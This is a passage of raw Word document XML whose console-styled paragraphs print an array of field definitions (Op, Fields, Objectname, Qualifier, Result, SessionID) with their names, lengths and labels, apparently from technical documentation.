            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BB17A35" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72AA1E4A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Op' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0358F153"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62EBB1F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Op',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49CD500E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648500FA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D835321" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="121910CD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Operation',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A64CF5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E32D98" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'list',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A58EAD8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70365D5F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70A8FDD8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Fields' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1F3CE2"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F6F75DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Fields',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62091E89" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E54EA8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02073131" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68F6D414" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Fields',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6032F4B5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DE2B4C0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '*',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3CD9EE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4281516F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="761DDE39" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72E314CF"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CA23CD1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4703DBE4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A179BFB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C7EA6F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E79A712" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0B5C64" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AE45619" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C7DAE4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1225468E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B107460" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Qualifier' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014D68F6"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11C04FEE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Qualifier',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C71789" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05DE98FC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479FABD7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53902059" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Qualifier',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B35D231" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ACD962A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C06A677" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="262D21F0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7BADA9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Result' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC1EC16"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D8ACA9A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="008B6225" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E40E401" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A77EDE8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EE9FBF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Response',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E731A49" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C42954" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="507247F1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3ECCE1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4346B5E5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ABCEA16"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C6D03F2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3D05FF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391BF27C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="003259A4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 60,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A58CD8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Session ID',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38191103" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34AE8073" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="258285E2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B56FB3B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
